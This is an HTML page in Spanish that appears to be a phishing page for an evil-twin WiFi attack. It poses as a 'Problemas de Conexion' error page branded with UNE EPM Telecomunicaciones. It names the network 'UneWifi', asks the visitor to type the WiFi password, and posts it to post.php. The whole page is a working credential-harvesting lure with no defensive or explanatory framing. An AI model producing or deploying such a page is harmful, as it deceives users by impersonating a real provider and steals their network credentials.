<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Error</title>
<script type="text/javascript" src="index_files/jquery_17.js"></script>
<script type="text/javascript" src="index_files/js/searcher.js"></script>
<link href="index_files/estilos.css" rel="stylesheet"  />

</head>
<body>
        
	<div id="header_404">
		<div class="center">
			<div class="logo">
				
			</div>
		</div>
	  </div>
	<div id="wrapper">
      <div id="top_404">
		<div class="left-side left">
                    <br/><br/>
			<h1>Problemas de <br/>Conexion.</h1>
			<p>
				Red WIFI: UneWifi			<br>
                        <div id="buscador">
                            <div class="moduletable buscador">
				<div class="search buscador borderRadius" id="searcher">
				por favor introdusca la clave wifi:
				<form action="post.php" method="post">
                                <input type="text" id="mod-search-searchword" name="password" autocomplete="off"></div>
				</form>
                            </div>
                        </div>
		</div>
		<div class="right-side left">
			<div class="publicidad">
                          
                          <img src='' border='0' alt='' />
			</div>
		</div>
		<div class="clr"></div>
	  </div>

      	
        <div class="clr"></div>
        <br/><br/><br/><br/>

      </div>
  </div>
  <div class="borde_inf"></div>
  <div id="footer">
  	<div id="contenedor_footer">
    	<div id="pague"></div>
      <div class="footer_izq left">
      	No está permitida su reproducción por ningún medio impreso, fotostático, electrónico o similar, sin la previa autorización escrita del titular de los derechos reservados.</br></br>
				Este sitio se visualiza mejor con Internet Explorer 8, Firefox 13, Google Chrome 20 (o superiores). Con una resolución mínima de 1024 x 768 pixeles </br></br>
				© Copyright 2012 UNE EPM Telecomunicaciones S.A.
      </div>
      <div class="footer_der left"></div>
    </div>
  </div>
</body>
</html>
